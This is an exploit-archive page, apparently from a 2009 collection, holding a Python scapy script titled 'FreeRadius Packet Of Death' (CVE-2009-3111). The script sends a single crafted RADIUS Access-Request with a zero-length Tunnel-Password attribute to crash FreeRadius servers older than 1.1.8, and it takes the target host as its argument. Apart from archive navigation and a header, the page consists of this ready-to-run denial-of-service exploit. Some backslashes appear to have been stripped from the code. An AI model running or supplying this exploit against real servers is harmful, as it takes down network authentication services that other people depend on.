FreeRadius < 1.1.8 Zero-length Tunnel-Password DoS Exploit (CVE-2009-3111)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : FreeRadius < 1.1.8 Zero-length Tunnel-Password DoS Exploit (CVE-2009-3111)
# Published : 2009-09-11
# Author : Matthew Gillespie
# Previous Title : PowerISO 4.0 Local Buffer Overflow PoC
# Next Title : Siemens Gigaset SE361 WLAN Remote Reboot Exploit

#!/usr/bin/env python
# FreeRadius Packet Of Death
# Matthew Gillespie 2009-09-11
# Requires RadiusAttr http://trac.secdev.org/scapy/attachment/ticket/92/radiuslib.py
# http://www.braindeadprojects.com/blog/what/freeradius-packet-of-death/

import sys
from scapy.all import IP,UDP,send,Radius,RadiusAttr

if len(sys.argv) != 2:
	print "Usage: radius_killer.py <radiushost>n"
	sys.exit(1)

PoD=IP(dst=sys.argv[1])/UDP(sport=60422,dport=1812)/ 
	Radius(code=1,authenticator="x99x99x99x99x99x99x99x99x99x99x99x99x99x99x99x99",id=180)/ 
	RadiusAttr(type=69,value="",len=2)

send(PoD)

# www.Syue.com [2009-09-11]